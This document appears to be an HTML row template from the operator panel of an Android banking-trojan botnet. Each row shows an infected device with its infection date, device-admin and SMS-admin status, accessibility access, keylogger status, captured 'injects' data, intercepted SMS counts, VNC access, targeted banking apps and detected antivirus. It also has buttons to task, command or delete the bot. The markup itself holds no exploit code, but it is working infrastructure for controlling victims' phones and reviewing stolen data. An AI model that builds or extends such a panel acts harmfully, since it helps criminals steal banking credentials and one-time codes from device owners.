<div class="row" style="font-size: 10pt">

	<div class="col-md-1 text-center">
		<label for="chk_%BOT_ID%">#%BOT_ID%&nbsp;</label>
		<input id="chk_%BOT_ID%" type='checkbox' name='elem_id[]' value='%BOT_BOT_ID%' title='%BOT_BOT_ID%' />
	</div>
	
	<div class="col-md-1 text-center">
		<b>%BOT_TAG%</b><br />
		%BOT_ID_FULL%
		<i style='color: green'>%BOT_MODEL%</i>
	</div>
	
	<div class="col-md-2">
		Last seen: <span style='color: black'>%LAST_SEEN_MARKER% %LAST_SEEN_AGO%</span><br />
		Uptime: <span style='color: black'>%UPTIME%</span><br />
		Infected: <span style='color: black'>%REG_DATE%</span><br />
		Android: <span style='color: black'>%BOT_ANDROID%</span><br />
		%SUPRESSED%
<!--
		Operator: <span style='color: black'>%BOT_OPERATOR%</span><br />
-->
	</div>
	
	<div class="col-md-3">
		%FG_STATE%
		%SCREEN_STATE%
		%IS_DEVICE_ADMIN%
		%IS_SMS_ADMIN%
		%IS_DEVICE_LOCKED%
<!--		%IS_LOADER_INSTALLED% -->
		%HAS_ACSB%
		%PUSH_ADMIN%
		%ON_CHARGER%
		%IS_GO%
		%PERMS_FAILED%
		<br />
		<br />
		
		<div class="row">
			<div class="col-md-1">
			<img src='%COUNTRY_FLAG_PATH%' alt='Country: %BOT_COUNTRY%'  title='Country: %BOT_COUNTRY%' />
			</div>
			
			<div class="col-md-1">
				<img src='%LANG_FLAG_PATH%' alt='Language: %BOT_LANG%'  title='Language: %BOT_LANG%' /> 
			</div>

			<div class="col-md-1" style="margin-right: 10px">
				%KEYLOGGER_ICON%
			</div>
			
			<div class="col-md-7">
				<a title="Injects data" class="%SMARTS_SZ_HIDE%" href="?a=admin&action=bots&bbot_id=%BOT_BOT_ID%&page=bot_page#injects" 
					style="color: black; margin-right: 10px"
				><i title="Injects data" style="color: black; margin: 0" class="flaticon-paper-bill"></i>&nbsp;<small>%SMARTS_DATA_SZ%</small></a>
				
				<a title="SMS"  class="%SMS_SZ_HIDE%" href="?a=admin&action=bots&bbot_id=%BOT_BOT_ID%&page=bot_page#sms" style="color: black"><i title="SMS intercepted" class="flaticon-envelope-of-white-paper" style="color: black; margin: 0"></i> <small>%SMS_SZ%</small></a>
			</div>


		</div>
		
		
	</div>
	



	<div class="col-md-1 text-right" style="padding: 0">
		
<p style='margin: 0'>
		<a title="Bot page" href="?a=admin&action=bots&bbot_id=%BOT_BOT_ID%&page=bot_page"><button style="width: 50px" class="btn btn-primary btn-xs"><i class="flaticon-information-button" style="color: white"></i></button></a>

		<a title="Tasks" href="?a=admin&action=bots&bbot_id=%BOT_BOT_ID%&page=tasks"><button style="width: 55px" class="btn btn-magenta btn-xs"><i class="flaticon-list" style="color: white"></i> %TASKS_NUM%</button></a>
</p>
<p style='margin: 0'>
		<button style="width: 50px" title="Commands" class="btn btn-success btn-xs" onclick="show_commands('%BOT_BOT_ID%')"><i class="flaticon-magic-wand" style="color: white"></i></button>

		<a href='?a=admin&action=bots&bbot_id=%BOT_BOT_ID%&naction=delete_bot'><button style="width: 55px" class='btn btn-xs btn-danger' onclick='return confirm("Are you sure?")' title='Delete the bot'><i class="flaticon-trash" style="color: white"></i></button></a>
		
</p>
<p style='margin: 0'>
		%VNC%
</p>
	</div>

	<div class="col-md-2">
		%TARGET_APPS%
		%AV_APPS%
		%UNINSTALLED_APPS%
	</div>
	
	<div class="col-md-2">
		<textarea id="comment_%BOT_BOT_ID%" onkeyup="showSaveButt('%BOT_BOT_ID%')" onchange="showSaveButt('%BOT_BOT_ID%')" style="width: 90%; height: 50px; font-size: 10pt" class="form-control input-sm" placeholder="Comment" 
	 >%COMMENT%</textarea>
	 
		<button id="save_comm_butt_%BOT_BOT_ID%" type="button" 
		style="display: none; width: 100%; border-left: 0; font-size: 8pt"
			onclick="save_comment_bots('%BOT_BOT_ID%')" 
			class="btn btn-info btn-sm">Save</button>
			
		<script>
		$('#comment_%BOT_BOT_ID%').on("keypress", function (e) {            

			if(e.keyCode == 13) 
			{
				save_comment_bots('%BOT_BOT_ID%')
				e.preventDefault(); 
			}
		});
		</script>
	</div>
	
</div>

<hr />
